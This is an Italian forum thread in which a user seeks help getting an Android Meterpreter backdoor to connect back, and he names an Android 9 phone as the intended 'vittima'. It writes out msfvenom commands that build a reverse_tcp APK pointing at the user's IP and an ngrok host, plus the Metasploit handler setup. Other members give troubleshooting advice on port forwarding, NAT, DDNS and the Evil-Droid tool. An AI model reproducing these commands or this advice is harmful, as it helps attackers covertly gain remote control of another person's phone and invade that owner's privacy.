Domanda Malware Backdoor Android problema ... (un altro)

Regis Lemures

Utente Iron
25 Giugno 2021
6
2
4
9
Buongiorno a tutti ho un problema.So che ci sono thread che parlano di cio,ne ho visti sia qui che altrove ma non hanno risolto il mio. Non riesco ad arrivare al cell android (versione 4.4.2 per test e 9 sarà quello "vittima" se funziona il test :) ) e comunicare con la connessione dati
(il cell non sono rooted e quello test non ha abilitato il playstore e dunque il protect)

(Kali in VirtualBox scheda con bridge)

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx LPORT=4444 R > 4444.apk
-----------------------------
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.xxx.xxx
set lport 4444
exploit
----------FIREWALL--------------------
[ 1] 4444/tcp ALLOW IN 192.168.xxx.xxx
[ 2] 192.168.xxx.xxx 4444/tcp ALLOW IN 192.168.xxx.xxx 4444/tcp
[ 3] 192.168.xxx.xxx 4444/tcp ALLOW OUT 192.168.xxx.xxx 4444/tcp (out)
-----------netstat -lntu--------------
Prima tutto chiuso
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State

Dopo aver eseguito MSFCONSOLE va in ascolto ma nulla

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 192.168.xxx.xxx:4444 0.0.0.0:* LISTEN

Dopo aver eseguito EVIL-DROID va in ascolto ma nulla
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 192.168.xxx.xxx:4444 0.0.0.0:* LISTEN
tcp6 0 0 :::80 :::* LISTEN
--------------------------------------
ho provato ad usare NOIP (ora però disattivato nel router)
--------------------------------------
ho provato anche a seguire questo:


msfvenom -p android/meterpreter/reverse_tcp LHOST=4.tcp.ngrok.io LPORT=4444 R > /home/kali/Scrivania/4444.apk
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 4.tcp.ngrok.io
set lport 4444
exploit
------------ROUTER--------------------
fritzbox 7530 Eolo nat3 dove ho inserito l ip di kali e inserito la porta 4444 tcp
anche se guardando nel router l ip su internet da 100.126.181.xxx ma se faccio un test del mio ip da 146.241.148.xxx
--------------------------------------

guardondo qua e quardando la ho fatto un casino nella testa e non riesco piu a uscirne :(

Grazie
 

0xbro

Super Moderatore
24 Febbraio 2017
4,044
153
3,021
1,645
Non è un fake, probabilmente c'è una soluzione, bisogna solo avere il tempo per fare diverse prove. Evildroid non l'ho mai usato, proverei a usare direttamente msfvenom per la generazione dell'APK e inizierei a fare le prove solo in locale, in modo da verificare che così funzioni.
Purtroppo il debug è un processo dispendioso e serve tempo, talvolta è più efficace ripartire da zero
 

IlMagoDeiTeoremi

Utente Bronze
30 Marzo 2021
77
11
21
31
Buongiorno a tutti ho un problema.So che ci sono thread che parlano di cio,ne ho visti sia qui che altrove ma non hanno risolto il mio. Non riesco ad arrivare al cell android (versione 4.4.2 per test e 9 sarà quello "vittima" se funziona il test :) ) e comunicare con la connessione dati
(il cell non sono rooted e quello test non ha abilitato il playstore e dunque il protect)

(Kali in VirtualBox scheda con bridge)

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx LPORT=4444 R > 4444.apk
-----------------------------
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.xxx.xxx
set lport 4444
exploit
----------FIREWALL--------------------
[ 1] 4444/tcp ALLOW IN 192.168.xxx.xxx
[ 2] 192.168.xxx.xxx 4444/tcp ALLOW IN 192.168.xxx.xxx 4444/tcp
[ 3] 192.168.xxx.xxx 4444/tcp ALLOW OUT 192.168.xxx.xxx 4444/tcp (out)
-----------netstat -lntu--------------
Prima tutto chiuso
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State

Dopo aver eseguito MSFCONSOLE va in ascolto ma nulla
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 192.168.xxx.xxx:4444 0.0.0.0:* LISTEN

Dopo aver eseguito EVIL-DROID va in ascolto ma nulla
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 192.168.xxx.xxx:4444 0.0.0.0:* LISTEN
tcp6 0 0 :::80 :::* LISTEN
--------------------------------------
ho provato ad usare NOIP (ora però disattivato nel router)
--------------------------------------
ho provato anche a seguire questo:


msfvenom -p android/meterpreter/reverse_tcp LHOST=4.tcp.ngrok.io LPORT=4444 R > /home/kali/Scrivania/4444.apk
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 4.tcp.ngrok.io
set lport 4444
exploit
------------ROUTER--------------------
fritzbox 7530 Eolo nat3 dove ho inserito l ip di kali e inserito la porta 4444 tcp
anche se guardando nel router l ip su internet da 100.126.181.xxx ma se faccio un test del mio ip da 146.241.148.xxx
--------------------------------------

guardondo qua e quardando la ho fatto un casino nella testa e non riesco piu a uscirne :(

Grazie

Da quel che ho capito riscontri problemi con il port forwarding e non si stabilisce la connessione con il dispositivo vittima, anche io riscontrai problemi utilizzando ngrok, ti consiglio di provare aprendo la porta e l'indirizzo ip che devi usare direttamente dal tuo router andando in 192.168.1.1 ovviamente protocollo tcp e quando crei l'apk che sia con evildroid o con msfvenom inserisci il tuo ip pubblico che puoi trovare semplicemente su what is my ip, se invece tu stessi facendo delle prove in locale quindi sulla stessa rete assicurati che il dispositivo da cui usi metasploit e il dispositivo android vittima siano connessi entrambi alla stessa rete, se riscontri altri problemi chiedi pure perchè sono abbastanza informato in questo argomento dato che ci sono stato azzeccato per un po, stesso io utilizzo evildroid da tanto tempo e qualche giorno fa ho fatto dei test sul mio s9 plus con android 9 e anche con android 10, genera l'apk icon changer e non si dovrebbero verificare problemi (con evildroid almeno)
 

0xbro

Super Moderatore
24 Febbraio 2017
4,044
153
3,021
1,645
Da quel che ho capito riscontri problemi con il port forwarding e non si stabilisce la connessione con il dispositivo vittima, anche io riscontrai problemi utilizzando ngrok, ti consiglio di provare aprendo la porta e l'indirizzo ip che devi usare direttamente dal tuo router andando in 192.168.1.1 ovviamente protocollo tcp e quando crei l'apk che sia con evildroid o con msfvenom inserisci il tuo ip pubblico che puoi trovare semplicemente su what is my ip, se invece tu stessi facendo delle prove in locale quindi sulla stessa rete assicurati che il dispositivo da cui usi metasploit e il dispositivo android vittima siano connessi entrambi alla stessa rete, se riscontri altri problemi chiedi pure perchè sono abbastanza informato in questo argomento dato che ci sono stato azzeccato per un po, stesso io utilizzo evildroid da tanto tempo e qualche giorno fa ho fatto dei test sul mio s9 plus con android 9 e anche con android 10, genera l'apk icon changer e non si dovrebbero verificare problemi (con evildroid almeno)
Il problema è che dagli IP che ha messo mi risulta che utilizzi Eolo e che sia sotto NAT, per cui anche facendo il port forwarding non può funzionare. L'unica soluzione è usare un DDNS come no-ip oppure richiedere un IP pubblico statico (che Eolo fa pagare)
 

Regis Lemures

Utente Iron
25 Giugno 2021
6
2
4
9
buongiorno

ho provato ad usare NOIP (ora però disattivato nel router)
con Noip non è cambiato nulla,riproverò a riabilitarlo

inserisci il tuo ip pubblico che puoi trovare semplicemente su what is my ip
ma inserendo ip pubblico appena salta la corrente o succede qualcosa al router e quindi cambia ip l'apk creato non serve più e va rifatto tutto da capo?!?
secondo what is my ip ho questo ip :146.241.132.xxx ma come si vede nell'immagine allegata la porta abilitata per kali (oltre avergli dato Exposed Host) ha un altro ip
 

Allegati

  • ip.png
    ip.png
    33.8 KB · Visualizzazioni: 15

IlMagoDeiTeoremi

Utente Bronze
30 Marzo 2021
77
11
21
31
buongiorno


con Noip non è cambiato nulla,riproverò a riabilitarlo


ma inserendo ip pubblico appena salta la corrente o succede qualcosa al router e quindi cambia ip l'apk creato non serve più e va rifatto tutto da capo?!?
secondo what is my ip ho questo ip :146.241.132.xxx ma come si vede nell'immagine allegata la porta abilitata per kali (oltre avergli dato Exposed Host) ha un altro ip
prova ad utilizzare quello che ti da nell'imagine, non conosco come funziona con il tuo isp forse crea un indirizzo a parte
 

0xbro

Super Moderatore
24 Febbraio 2017
4,044
153
3,021
1,645
buongiorno


con Noip non è cambiato nulla,riproverò a riabilitarlo


ma inserendo ip pubblico appena salta la corrente o succede qualcosa al router e quindi cambia ip l'apk creato non serve più e va rifatto tutto da capo?!?
secondo what is my ip ho questo ip :146.241.132.xxx ma come si vede nell'immagine allegata la porta abilitata per kali (oltre avergli dato Exposed Host) ha un altro ip
Ripeto, questa cosa si chiama NAT, il tuo router non è esposto, per cui non lo puoi raggiungere dall'esterno. Ho già spiegato più volte come funziona il NAT, cercate sul forum oppure su Google. L'unico modo per, forse, riuscire a risolvere è utilizzare dei DDNS oppure pagare e richiedere un indirizzo IP pubblico e statico
 

Regis Lemures

Utente Iron
25 Giugno 2021
6
2
4
9
avevo capito che noip aggirasse il problema fornendo un ip statico raggiungibile ....invece se è un problema di nat è il provider, quindi pagando per un ip statico cambierebbe anche il tipo di nat ..... cio vuol dire che tutti i passaggi dalla creazione del apk etcc.. le porte abilitate nel firewall nel router sono giuste . è il gestore con le sue impostazioni a crearmi il problema . (e lo pago pure tanto, 70euri a bimestre)
Farò ancora dei tentativi poi nel caso vadano a vuoto cambierò gestore anche perchè volevo farmi una videosorveglianza casereccia gestibile da remoto ma meso cosi non inizio nemmeno

vabbeh non ho risolto il problema in un batter d'occhio ma almeno ho riordinato le idee ed è gia una buona cosa grazie a voi
 

0xbro

Super Moderatore
24 Febbraio 2017
4,044
153
3,021
1,645
avevo capito che noip aggirasse il problema fornendo un ip statico raggiungibile
No, NoIP fornisce un DNS statico che punterà sempre al tuo IP, anche nel caso dovesse esso cambiare.

Se paghi il provider e ti fai dare l'IP pubblico semplicemente non sei più sotto NAT e risolvi i tuoi problemi. Il NAT è una forma di sicurezza aggiuntiva oltre che un modo per poter fornire più IP quando in realtà se ne posseggono pochi. Comunque Eolo non è il solo ad usare il NAT, anche Fastweb e forse TIM implementano questa feature.

Ricorda inoltre che devi avere sia un IP pubblico che STATICO: provider come Vodafone ti danno l'IP pubblico, ma non è statico. Al riavvio del modem perdi il tuo vecchio IP e ne ottieni uno nuovo